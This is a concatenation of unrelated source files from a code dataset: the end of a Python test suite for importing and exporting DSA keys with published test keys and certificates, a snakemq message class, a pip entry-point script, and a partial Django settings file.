'7940564b670f963ab1164d4e2ca2bf6ffd39f12f548928bf4d2d1b5e6980b4f1'+\
'be4c92a91986fba55902145ebd9a3f0b82069d98420986b314215025756065'
def testImportKey3(self):
key_obj = DSA.importKey(self.der_private)
self.failUnless(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
self.assertEqual(self.x, key_obj.x)
def testExportKey3(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
encoded = key.export_key('DER', pkcs8=False)
self.assertEqual(self.der_private, encoded)
# 4.
pem_private="""\
-----BEGIN DSA PRIVATE KEY-----
MIIBuwIBAAKBgQDnVu4XF/S2eUx8IUckoZdjdCxFVytLP4/ztE876fRM4DmidXaV
7JFWl9p075FPzRsFZg4kGcdh1jn0XS15uALb0j56uLgbR5o4Dh8wkyWEuioLlVAy
NC68g8tcqQbnsNfNb+ZWzstMi1p3EjqMZ1CkgeOwYFev9qpuumILgy1gwwIVAK0y
9IzTrgxFoZimH6S14gMgdjsjAoGAed/cPWFP5jX8636urjcY3C7++0UoKZOsZ0nc
g8Ij2MGIcpYxazsLVEZs9ETzS4LjVU0LkKd4+q8TBvAl2uaj42x/k91brEBSuSNw
BArKcLjVggWZcRkA77yWGBLDVd2b7/4JgdqFxVSAdLQcVq5D/TANiSYuTv2JlD+Z
plGwOIgCgYEAgzUqaaEy80hD0qDrmVv/Ti8IOnPwBJ0skeovDOQ9FEq9pIGZ5LAD
xXCor4MwPUUQX2BsXEjZJaQO2cJjDC+kzb+DhTneuaKfkZCF8gRjafYnyoSyyx4s
eUBWS2cPljqxFk1OLKK/b/058S9UiSi/TS0bXmmAtPG+TJKpGYb7pVkCFF69mj8L
ggadmEIJhrMUIVAldWBl
-----END DSA PRIVATE KEY-----"""
def testImportKey4(self):
for pem in (self.pem_private, tostr(self.pem_private)):
key_obj = DSA.importKey(pem)
self.failUnless(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
self.assertEqual(self.x, key_obj.x)
def testExportKey4(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
encoded = key.export_key('PEM', pkcs8=False)
self.assertEqual(self.pem_private, encoded)
# 5. PKCS8 (unencrypted)
der_pkcs8=\
'3082014a0201003082012b06072a8648ce3804013082011e02818100e756ee17'+\
'17f4b6794c7c214724a19763742c45572b4b3f8ff3b44f3be9f44ce039a27576'+\
'95ec915697da74ef914fcd1b05660e2419c761d639f45d2d79b802dbd23e7ab8'+\
'b81b479a380e1f30932584ba2a0b955032342ebc83cb5ca906e7b0d7cd6fe656'+\
'cecb4c8b5a77123a8c6750a481e3b06057aff6aa6eba620b832d60c3021500ad'+\
'32f48cd3ae0c45a198a61fa4b5e20320763b2302818079dfdc3d614fe635fceb'+\
'7eaeae3718dc2efefb45282993ac6749dc83c223d8c1887296316b3b0b54466c'+\
'f444f34b82e3554d0b90a778faaf1306f025dae6a3e36c7f93dd5bac4052b923'+\
'70040aca70b8d5820599711900efbc961812c355dd9beffe0981da85c5548074'+\
'b41c56ae43fd300d89262e4efd89943f99a651b03888041602145ebd9a3f0b82'+\
'069d98420986b314215025756065'
def testImportKey5(self):
key_obj = DSA.importKey(self.der_pkcs8)
self.failUnless(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
self.assertEqual(self.x, key_obj.x)
def testExportKey5(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
encoded = key.export_key('DER')
self.assertEqual(self.der_pkcs8, encoded)
encoded = key.export_key('DER', pkcs8=True)
self.assertEqual(self.der_pkcs8, encoded)
# 6.
pem_pkcs8="""\
-----BEGIN PRIVATE KEY-----
MIIBSgIBADCCASsGByqGSM44BAEwggEeAoGBAOdW7hcX9LZ5THwhRyShl2N0LEVX
K0s/j/O0Tzvp9EzgOaJ1dpXskVaX2nTvkU/NGwVmDiQZx2HWOfRdLXm4AtvSPnq4
uBtHmjgOHzCTJYS6KguVUDI0LryDy1ypBuew181v5lbOy0yLWncSOoxnUKSB47Bg
V6/2qm66YguDLWDDAhUArTL0jNOuDEWhmKYfpLXiAyB2OyMCgYB539w9YU/mNfzr
fq6uNxjcLv77RSgpk6xnSdyDwiPYwYhyljFrOwtURmz0RPNLguNVTQuQp3j6rxMG
8CXa5qPjbH+T3VusQFK5I3AECspwuNWCBZlxGQDvvJYYEsNV3Zvv/gmB2oXFVIB0
tBxWrkP9MA2JJi5O/YmUP5mmUbA4iAQWAhRevZo/C4IGnZhCCYazFCFQJXVgZQ==
-----END PRIVATE KEY-----"""
def testImportKey6(self):
for pem in (self.pem_pkcs8, tostr(self.pem_pkcs8)):
key_obj = DSA.importKey(pem)
self.failUnless(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
self.assertEqual(self.x, key_obj.x)
def testExportKey6(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
encoded = key.export_key('PEM')
self.assertEqual(self.pem_pkcs8, encoded)
encoded = key.export_key('PEM', pkcs8=True)
self.assertEqual(self.pem_pkcs8, encoded)
# 7. OpenSSH/RFC4253
ssh_pub="""ssh-dss AAAAB3NzaC1kc3MAAACBAOdW7hcX9LZ5THwhRyShl2N0LEVXK0s/j/O0Tzvp9EzgOaJ1dpXskVaX2nTvkU/NGwVmDiQZx2HWOfRdLXm4AtvSPnq4uBtHmjgOHzCTJYS6KguVUDI0LryDy1ypBuew181v5lbOy0yLWncSOoxnUKSB47BgV6/2qm66YguDLWDDAAAAFQCtMvSM064MRaGYph+kteIDIHY7IwAAAIB539w9YU/mNfzrfq6uNxjcLv77RSgpk6xnSdyDwiPYwYhyljFrOwtURmz0RPNLguNVTQuQp3j6rxMG8CXa5qPjbH+T3VusQFK5I3AECspwuNWCBZlxGQDvvJYYEsNV3Zvv/gmB2oXFVIB0tBxWrkP9MA2JJi5O/YmUP5mmUbA4iAAAAIEAgzUqaaEy80hD0qDrmVv/Ti8IOnPwBJ0skeovDOQ9FEq9pIGZ5LADxXCor4MwPUUQX2BsXEjZJaQO2cJjDC+kzb+DhTneuaKfkZCF8gRjafYnyoSyyx4seUBWS2cPljqxFk1OLKK/b/058S9UiSi/TS0bXmmAtPG+TJKpGYb7pVk="""
def testImportKey7(self):
for ssh in (self.ssh_pub, tostr(self.ssh_pub)):
key_obj = DSA.importKey(ssh)
self.failIf(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
def testExportKey7(self):
tup = (self.y, self.g, self.p, self.q)
key = DSA.construct(tup)
encoded = key.export_key('OpenSSH')
self.assertEqual(self.ssh_pub, encoded)
# 8. Encrypted OpenSSL/OpenSSH
pem_private_encrypted="""\
-----BEGIN DSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,70B6908939D65E9F2EB999E8729788CE
4V6GHRDpCrdZ8MBjbyp5AlGUrjvr2Pn2e2zVxy5RBt4FBj9/pa0ae0nnyUPMLSUU
kKyOR0topRYTVRLElm4qVrb5uNZ3hRwfbklr+pSrB7O9eHz9V5sfOQxyODS07JxK
k1OdOs70/ouMXLF9EWfAZOmWUccZKHNblUwg1p1UrZIz5jXw4dUE/zqhvXh6d+iC
ADsICaBCjCrRQJKDp50h3+ndQjkYBKVH+pj8TiQ79U7lAvdp3+iMghQN6YXs9mdI
gFpWw/f97oWM4GHZFqHJ+VSMNFjBiFhAvYV587d7Lk4dhD8sCfbxj42PnfRgUItc
nnPqHxmhMQozBWzYM4mQuo3XbF2WlsNFbOzFVyGhw1Bx1s91qvXBVWJh2ozrW0s6
HYDV7ZkcTml/4kjA/d+mve6LZ8kuuR1qCiZx6rkffhh1gDN/1Xz3HVvIy/dQ+h9s
5zp7PwUoWbhqp3WCOr156P6gR8qo7OlT6wMh33FSXK/mxikHK136fV2shwTKQVII
rJBvXpj8nACUmi7scKuTWGeUoXa+dwTZVVe+b+L2U1ZM7+h/neTJiXn7u99PFUwu
xVJtxaV37m3aXxtCsPnbBg==
-----END DSA PRIVATE KEY-----"""
def testImportKey8(self):
for pem in (self.pem_private_encrypted, tostr(self.pem_private_encrypted)):
key_obj = DSA.importKey(pem, "PWDTEST")
self.failUnless(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
self.assertEqual(self.x, key_obj.x)
def testExportKey8(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
encoded = key.export_key('PEM', pkcs8=False, passphrase="PWDTEST")
key = DSA.importKey(encoded, "PWDTEST")
self.assertEqual(self.y, key.y)
self.assertEqual(self.p, key.p)
self.assertEqual(self.q, key.q)
self.assertEqual(self.g, key.g)
self.assertEqual(self.x, key.x)
# 9. Encrypted PKCS8
# pbeWithMD5AndDES-CBC
pem_pkcs8_encrypted="""\
-----BEGIN ENCRYPTED PRIVATE KEY-----
MIIBcTAbBgkqhkiG9w0BBQMwDgQI0GC3BJ/jSw8CAggABIIBUHc1cXZpExIE9tC7
7ryiW+5ihtF2Ekurq3e408GYSAu5smJjN2bvQXmzRFBz8W38K8eMf1sbWroZ4+zn
kZSbb9nSm5kAa8lR2+oF2k+WRswMR/PTC3f/D9STO2X0QxdrzKgIHEcSGSHp5jTx
aVvbkCDHo9vhBTl6S3ogZ48As/MEro76+9igUwJ1jNhIQZPJ7e20QH5qDpQFFJN4
CKl2ENSEuwGiqBszItFy4dqH0g63ZGZV/xt9wSO9Rd7SK/EbA/dklOxBa5Y/VItM
gnIhs9XDMoGYyn6F023EicNJm6g/bVQk81BTTma4tm+12TKGdYm+QkeZvCOMZylr
Wv67cKwO3cAXt5C3QXMDgYR64XvuaT5h7C0igMp2afSXJlnbHEbFxQVJlv83T4FM
eZ4k+NQDbEL8GiHmFxzDWQAuPPZKJWEEEV2p/To+WOh+kSDHQw==
-----END ENCRYPTED PRIVATE KEY-----"""
def testImportKey9(self):
for pem in (self.pem_pkcs8_encrypted, tostr(self.pem_pkcs8_encrypted)):
key_obj = DSA.importKey(pem, "PWDTEST")
self.failUnless(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
self.assertEqual(self.x, key_obj.x)
# 10. Encrypted PKCS8
# pkcs5PBES2 /
# pkcs5PBKDF2 (rounds=1000, salt=D725BF1B6B8239F4) /
# des-EDE3-CBC (iv=27A1C66C42AFEECE)
#
der_pkcs8_encrypted=\
'30820196304006092a864886f70d01050d3033301b06092a864886f70d01050c'+\
'300e0408d725bf1b6b8239f4020203e8301406082a864886f70d0307040827a1'+\
'c66c42afeece048201505cacfde7bf8edabb3e0d387950dc872662ea7e9b1ed4'+\
'400d2e7e6186284b64668d8d0328c33a9d9397e6f03df7cb68268b0a06b4e22f'+\
'7d132821449ecf998a8b696dbc6dd2b19e66d7eb2edfeb4153c1771d49702395'+\
'4f36072868b5fcccf93413a5ac4b2eb47d4b3f681c6bd67ae363ed776f45ae47'+\
'174a00098a7c930a50f820b227ddf50f9742d8e950d02586ff2dac0e3c372248'+\
'e5f9b6a7a02f4004f20c87913e0f7b52bccc209b95d478256a890b31d4c9adec'+\
'21a4d157a179a93a3dad06f94f3ce486b46dfa7fc15fd852dd7680bbb2f17478'+\
'7e71bd8dbaf81eca7518d76c1d26256e95424864ba45ca5d47d7c5a421be02fa'+\
'b94ab01e18593f66cf9094eb5c94b9ecf3aa08b854a195cf87612fbe5e96c426'+\
'2b0d573e52dc71ba3f5e468c601e816c49b7d32c698b22175e89aaef0c443770'+\
'5ef2f88a116d99d8e2869a4fd09a771b84b49e4ccb79aadcb1c9'
def testImportKey10(self):
key_obj = DSA.importKey(self.der_pkcs8_encrypted, "PWDTEST")
self.failUnless(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
self.assertEqual(self.x, key_obj.x)
def testExportKey10(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
randfunc = BytesIO(unhexlify(b("27A1C66C42AFEECE") + b("D725BF1B6B8239F4"))).read
encoded = key.export_key('DER', pkcs8=True, passphrase="PWDTEST", randfunc=randfunc)
self.assertEqual(self.der_pkcs8_encrypted, encoded)
# ----
def testImportError1(self):
self.assertRaises(ValueError, DSA.importKey, self.der_pkcs8_encrypted, "wrongpwd")
def testExportError2(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
self.assertRaises(ValueError, key.export_key, 'DER', pkcs8=False, passphrase="PWDTEST")
def test_import_key(self):
"""Verify importKey is an alias to import_key"""
key_obj = DSA.import_key(self.der_public)
self.failIf(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
def test_exportKey(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
self.assertEquals(key.exportKey(), key.export_key())
def test_import_empty(self):
self.assertRaises(ValueError, DSA.import_key, b'')
class ImportKeyFromX509Cert(unittest.TestCase):
def test_x509v1(self):
# Sample V1 certificate with a 1024 bit DSA key
x509_v1_cert = """
-----BEGIN CERTIFICATE-----
MIIDUjCCArsCAQIwDQYJKoZIhvcNAQEFBQAwfjENMAsGA1UEChMEQWNtZTELMAkG
A1UECxMCUkQxHDAaBgkqhkiG9w0BCQEWDXNwYW1AYWNtZS5vcmcxEzARBgNVBAcT
Ck1ldHJvcG9saXMxETAPBgNVBAgTCE5ldyBZb3JrMQswCQYDVQQGEwJVUzENMAsG
A1UEAxMEdGVzdDAeFw0xNDA3MTEyMDM4NDNaFw0xNzA0MDYyMDM4NDNaME0xCzAJ
BgNVBAYTAlVTMREwDwYDVQQIEwhOZXcgWW9yazENMAsGA1UEChMEQWNtZTELMAkG
A1UECxMCUkQxDzANBgNVBAMTBnBvbGFuZDCCAbYwggErBgcqhkjOOAQBMIIBHgKB
gQDOrN4Ox4+t3T6wKeHfhzArhcrNEFMQ4Ss+4PIKyimDy9Bn64WPkL1B/9dvYIga
23GLu6tVJmXo6EdJnVOHEMhr99EeOwuDWWeP7Awq7RSlKEejokr4BEzMTW/tExSD
cO6/GI7xzh0eTH+VTTPDfyrJMYCkh0rJAfCP+5xrmPNetwIVALtXYOV1yoRrzJ2Q
M5uEjidH6GiZAoGAfUqA1SAm5g5U68SILMVX9l5rq0OpB0waBMpJQ31/R/yXNDqo
c3gGWZTOJFU4IzwNpGhrGNADUByz/lc1SAOAdEJIr0JVrhbGewQjB4pWqoLGbBKz
RoavTNDc/zD7SYa12evWDHADwvlXoeQg+lWop1zS8OqaDC7aLGKpWN3/m8kDgYQA
AoGAKoirPAfcp1rbbl4y2FFAIktfW8f4+T7d2iKSg73aiVfujhNOt1Zz1lfC0NI2
eonLWO3tAM4XGKf1TLjb5UXngGn40okPsaA81YE6ZIKm20ywjlOY3QkAEdMaLVY3
9PJvM8RGB9m7pLKxyHfGMfF40MVN4222zKeGp7xhM0CNiCUwDQYJKoZIhvcNAQEF
BQADgYEAfbNZfpYa2KlALEM1FZnwvQDvJHntHz8LdeJ4WM7CXDlKi67wY2HKM30w
s2xej75imkVOFd1kF2d0A8sjfriXLVIt1Hwq9ANZomhu4Edx0xpH8tqdh/bDtnM2
TmduZNY9OWkb07h0CtWD6Zt8fhRllVsSSrlWd/2or7FXNC5weFQ=
-----END CERTIFICATE-----
""".strip()
# DSA public key as dumped by openssl
y_str = """
2a:88:ab:3c:07:dc:a7:5a:db:6e:5e:32:d8:51:40:
22:4b:5f:5b:c7:f8:f9:3e:dd:da:22:92:83:bd:da:
89:57:ee:8e:13:4e:b7:56:73:d6:57:c2:d0:d2:36:
7a:89:cb:58:ed:ed:00:ce:17:18:a7:f5:4c:b8:db:
e5:45:e7:80:69:f8:d2:89:0f:b1:a0:3c:d5:81:3a:
64:82:a6:db:4c:b0:8e:53:98:dd:09:00:11:d3:1a:
2d:56:37:f4:f2:6f:33:c4:46:07:d9:bb:a4:b2:b1:
c8:77:c6:31:f1:78:d0:c5:4d:e3:6d:b6:cc:a7:86:
a7:bc:61:33:40:8d:88:25
"""
p_str = """
00:ce:ac:de:0e:c7:8f:ad:dd:3e:b0:29:e1:df:87:
30:2b:85:ca:cd:10:53:10:e1:2b:3e:e0:f2:0a:ca:
29:83:cb:d0:67:eb:85:8f:90:bd:41:ff:d7:6f:60:
88:1a:db:71:8b:bb:ab:55:26:65:e8:e8:47:49:9d:
53:87:10:c8:6b:f7:d1:1e:3b:0b:83:59:67:8f:ec:
0c:2a:ed:14:a5:28:47:a3:a2:4a:f8:04:4c:cc:4d:
6f:ed:13:14:83:70:ee:bf:18:8e:f1:ce:1d:1e:4c:
7f:95:4d:33:c3:7f:2a:c9:31:80:a4:87:4a:c9:01:
f0:8f:fb:9c:6b:98:f3:5e:b7
"""
q_str = """
00:bb:57:60:e5:75:ca:84:6b:cc:9d:90:33:9b:84:
8e:27:47:e8:68:99
"""
g_str = """
7d:4a:80:d5:20:26:e6:0e:54:eb:c4:88:2c:c5:57:
f6:5e:6b:ab:43:a9:07:4c:1a:04:ca:49:43:7d:7f:
47:fc:97:34:3a:a8:73:78:06:59:94:ce:24:55:38:
23:3c:0d:a4:68:6b:18:d0:03:50:1c:b3:fe:57:35:
48:03:80:74:42:48:af:42:55:ae:16:c6:7b:04:23:
07:8a:56:aa:82:c6:6c:12:b3:46:86:af:4c:d0:dc:
ff:30:fb:49:86:b5:d9:eb:d6:0c:70:03:c2:f9:57:
a1:e4:20:fa:55:a8:a7:5c:d2:f0:ea:9a:0c:2e:da:
2c:62:a9:58:dd:ff:9b:c9
"""
key = DSA.importKey(x509_v1_cert)
for comp_name in ('y', 'p', 'q', 'g'):
comp_str = locals()[comp_name + "_str"]
comp = int(re.sub("[^0-9a-f]", "", comp_str), 16)
self.assertEqual(getattr(key, comp_name), comp)
self.failIf(key.has_private())
def test_x509v3(self):
# Sample V3 certificate with a 1024 bit DSA key
x509_v3_cert = """
-----BEGIN CERTIFICATE-----
MIIFhjCCA26gAwIBAgIBAzANBgkqhkiG9w0BAQsFADBhMQswCQYDVQQGEwJVUzEL
MAkGA1UECAwCTUQxEjAQBgNVBAcMCUJhbHRpbW9yZTEQMA4GA1UEAwwHVGVzdCBD
QTEfMB0GCSqGSIb3DQEJARYQdGVzdEBleGFtcGxlLmNvbTAeFw0xNDA3MTMyMDUz
MjBaFw0xNzA0MDgyMDUzMjBaMEAxCzAJBgNVBAYTAlVTMQswCQYDVQQIDAJNRDES
MBAGA1UEBwwJQmFsdGltb3JlMRAwDgYDVQQDDAdhdXN0cmlhMIIBtjCCASsGByqG
SM44BAEwggEeAoGBALfd8gyEpVPA0ZI69Kp3nyJcu5N0ZZ3K1K9hleQLNqKEcZOh
7a/C2J1TPdmHTLJ0rAwBZ1nWxnARSgRphziGDFspKCYQwYcSMz8KoFgvXbXpuchy
oFACiQ2LqZnc5MakuLQtLcQciSYGYj3zmZdYMoa904F1aDWr+DxQI6DVC3/bAhUA
hqXMCJ6fQK3G2O9S3/CC/yVZXCsCgYBRXROl3R2khX7l10LQjDEgo3B1IzjXU/jP
McMBl6XO+nBJXxr/scbq8Ajiv7LTnGpSjgryHtvfj887kfvo8QbSS3kp3vq5uSqI
ui7E7r3jguWaLj616AG1HWOctXJUjqsiabZwsp2h09gHTzmHEXBOmiARu8xFxKAH
xsuo7onAbwOBhAACgYBylWjWSnKHE8mHx1A5m/0GQx6xnhWIe3+MJAnEhRGxA2J4
SCsfWU0OwglIQToh1z5uUU9oDi9cYgNPBevOFRnDhc2yaJY6VAYnI+D+6J5IU6Yd
0iaG/iSc4sV4bFr0axcPpse3SN0XaQxiKeSFBfFnoMqL+dd9Gb3QPZSllBcVD6OB
1TCB0jAdBgNVHQ4EFgQUx5wN0Puotv388M9Tp/fsPbZpzAUwHwYDVR0jBBgwFoAU
a0hkif3RMaraiWtsOOZZlLu9wJwwCQYDVR0TBAIwADALBgNVHQ8EBAMCBeAwSgYD
VR0RBEMwQYILZXhhbXBsZS5jb22CD3d3dy5leGFtcGxlLmNvbYIQbWFpbC5leGFt
cGxlLmNvbYIPZnRwLmV4YW1wbGUuY29tMCwGCWCGSAGG+EIBDQQfFh1PcGVuU1NM
IEdlbmVyYXRlZCBDZXJ0aWZpY2F0ZTANBgkqhkiG9w0BAQsFAAOCAgEAyWf1TiJI
aNEIA9o/PG8/JiGASTS2/HBVTJbkq03k6NkJVk/GxC1DPziTUJ+CdWlHWcAi1EOW
Ach3QxNDRrVfCOfCMDgElIO1094/reJgdFYG00LRi8QkRJuxANV7YS4tLudhyHJC
kR2lhdMNmEuzWK+s2y+5cLrdm7qdvdENQCcV67uvGPx4sc+EaE7x13SczKjWBtbo
QCs6JTOW+EkPRl4Zo27K4OIZ43/J+GxvwU9QUVH3wPVdbbLNw+QeTFBYMTEcxyc4
kv50HPBFaithziXBFyvdIs19FjkFzu0Uz/e0zb1+vMzQlJMD94HVOrMnIj5Sb2cL
KKdYXS4uhxFJmdV091Xur5JkYYwEzuaGav7J3zOzYutrIGTgDluLCvA+VQkRcTsy
jZ065SkY/v+38QHp+cmm8WRluupJTs8wYzVp6Fu0iFaaK7ztFmaZmHpiPIfDFjva
aCIgzzT5NweJd/b71A2SyzHXJ14zBXsr1PMylMp2TpHIidhuuNuQL6I0HaollB4M
Z3FsVBMhVDw4Z76qnFPr8mZE2tar33hSlJI/3pS/bBiukuBk8U7VB0X8OqaUnP3C
7b2Z4G8GtqDVcKGMzkvMjT4n9rKd/Le+qHSsQOGO9W/0LB7UDAZSwUsfAPnoBgdS
5t9tIomLCOstByXi+gGZue1TcdCa3Ph4kO0=
-----END CERTIFICATE-----
""".strip()
# DSA public key as dumped by openssl
y_str = """
72:95:68:d6:4a:72:87:13:c9:87:c7:50:39:9b:fd:
06:43:1e:b1:9e:15:88:7b:7f:8c:24:09:c4:85:11:
b1:03:62:78:48:2b:1f:59:4d:0e:c2:09:48:41:3a:
21:d7:3e:6e:51:4f:68:0e:2f:5c:62:03:4f:05:eb:
ce:15:19:c3:85:cd:b2:68:96:3a:54:06:27:23:e0:
fe:e8:9e:48:53:a6:1d:d2:26:86:fe:24:9c:e2:c5:
78:6c:5a:f4:6b:17:0f:a6:c7:b7:48:dd:17:69:0c:
62:29:e4:85:05:f1:67:a0:ca:8b:f9:d7:7d:19:bd:
d0:3d:94:a5:94:17:15:0f
"""
p_str = """
00:b7:dd:f2:0c:84:a5:53:c0:d1:92:3a:f4:aa:77:
9f:22:5c:bb:93:74:65:9d:ca:d4:af:61:95:e4:0b:
36:a2:84:71:93:a1:ed:af:c2:d8:9d:53:3d:d9:87:
4c:b2:74:ac:0c:01:67:59:d6:c6:70:11:4a:04:69:
87:38:86:0c:5b:29:28:26:10:c1:87:12:33:3f:0a:
a0:58:2f:5d:b5:e9:b9:c8:72:a0:50:02:89:0d:8b:
a9:99:dc:e4:c6:a4:b8:b4:2d:2d:c4:1c:89:26:06:
62:3d:f3:99:97:58:32:86:bd:d3:81:75:68:35:ab:
f8:3c:50:23:a0:d5:0b:7f:db
"""
q_str = """
00:86:a5:cc:08:9e:9f:40:ad:c6:d8:ef:52:df:f0:
82:ff:25:59:5c:2b
"""
g_str = """
51:5d:13:a5:dd:1d:a4:85:7e:e5:d7:42:d0:8c:31:
20:a3:70:75:23:38:d7:53:f8:cf:31:c3:01:97:a5:
ce:fa:70:49:5f:1a:ff:b1:c6:ea:f0:08:e2:bf:b2:
d3:9c:6a:52:8e:0a:f2:1e:db:df:8f:cf:3b:91:fb:
e8:f1:06:d2:4b:79:29:de:fa:b9:b9:2a:88:ba:2e:
c4:ee:bd:e3:82:e5:9a:2e:3e:b5:e8:01:b5:1d:63:
9c:b5:72:54:8e:ab:22:69:b6:70:b2:9d:a1:d3:d8:
07:4f:39:87:11:70:4e:9a:20:11:bb:cc:45:c4:a0:
07:c6:cb:a8:ee:89:c0:6f
"""
key = DSA.importKey(x509_v3_cert)
for comp_name in ('y', 'p', 'q', 'g'):
comp_str = locals()[comp_name + "_str"]
comp = int(re.sub("[^0-9a-f]", "", comp_str), 16)
self.assertEqual(getattr(key, comp_name), comp)
self.failIf(key.has_private())
if __name__ == '__main__':
unittest.main()
def get_tests(config={}):
tests = []
tests += list_test_cases(ImportKeyTests)
tests += list_test_cases(ImportKeyFromX509Cert)
return tests
if __name__ == '__main__':
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
|
[
"lit2020026@gmail.com"
] |
lit2020026@gmail.com
|
114b3d3a2bf7d6786729b241bf34b660dd8e5767
|
934e3d3d31fd25b1d389f02f8dfb9526ab831c30
|
/snakemq/message.py
|
d92ff84a1d40ff35480dc548e98298fced5ddb41
|
[
"MIT"
] |
permissive
|
dsiroky/snakemq
|
e98a3e13b1336fff8c7d5e4f7bdb33df3f9b41e9
|
2d53a25c7ef613bc7cc1e4e8e39ab4fc5990a1a5
|
refs/heads/master
| 2021-01-17T13:58:08.701625
| 2021-01-08T15:09:04
| 2021-01-08T15:54:09
| 4,480,770
| 93
| 31
|
MIT
| 2021-01-08T15:54:11
| 2012-05-29T10:35:43
|
Python
|
UTF-8
|
Python
| false
| false
| 1,481
|
py
|
# -*- coding: utf-8 -*-
"""
Message container.
:author: David Siroky (siroky@dasir.cz)
:license: MIT License (see LICENSE.txt or
U{http://www.opensource.org/licenses/mit-license.php})
"""
import uuid as uuid_module
###########################################################################
###########################################################################
FLAG_PERSISTENT = 0x1 #: store to a persistent storage
MAX_UUID_LENGTH = 16
###########################################################################
###########################################################################
class Message(object):
def __init__(self, data, ttl=0, flags=0, uuid=None):
"""
:param data: (bytes) payload
:param ttl: messaging TTL in seconds (integer or float), None is infinity
:param flags: combination of FLAG_*
:param uuid: (bytes) unique message identifier (implicitly generated)
"""
assert type(data) == bytes
assert uuid is None or (type(uuid) == bytes), uuid
self.data = data
self.ttl = None if ttl is None else float(ttl)
self.flags = flags
self.uuid = (uuid or bytes(uuid_module.uuid4().bytes))[:MAX_UUID_LENGTH]
############################################################
def __repr__(self):
return "<%s id=%X uuid=%r ttl=%r len=%i>" % (
self.__class__.__name__, id(self), self.uuid,
self.ttl, len(self.data))
|
[
"siroky@dasir.cz@33c95183-15fb-0310-8df2-8fb703102c40"
] |
siroky@dasir.cz@33c95183-15fb-0310-8df2-8fb703102c40
|
a567f145f84cac46f8e11448ac4a8fa59e6465a1
|
ca200e687345bad0b9cdd96cb9fa9eca6a988064
|
/Python/venv/bin/pip3
|
550a2751dadf5e9b7432b17e7089b7992a0d4d46
|
[
"MIT"
] |
permissive
|
Nyahmi/ET-WorldGenerator
|
457799fc3116ceaf9cfd5fed509db4300202baf6
|
7506102ca1116536ebcdcdb352cf96b93cd53120
|
refs/heads/master
| 2022-04-26T18:09:11.286810
| 2020-04-10T21:32:51
| 2020-04-10T21:32:51
| 254,658,009
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 411
|
#!/home/onyx_systems/PycharmProjects/Python-ET/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
|
[
"beta.nara.softworks@gmail.com"
] |
beta.nara.softworks@gmail.com
|
|
c8fce935f78fcfd518f015bd17919a744309a23d
|
06280e8f429caadda78d251a31647e7cc99653a8
|
/Agenda/Agenda/settings.py
|
db88366ed20b6782220cc2f2fa5023d8b3f24216
|
[] |
no_license
|
joaovmoreno/Agenda
|
3341f2fe6124465c46bed4d85776019e26ee3a78
|
cf0b431eb7653c550f12687bac431c989c49a450
|
refs/heads/master
| 2021-09-15T21:59:36.773294
| 2018-06-11T19:35:22
| 2018-06-11T19:35:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,180
|
py
|
"""
Django settings for Agenda project.
Generated by 'django-admin startproject' using Django 2.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'h0rmbh-5^8mx8#h8bq_+brswj0)3vum_#ds=v20b-#p&v-gto('
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Agendas.apps.AgendasConfig',
]
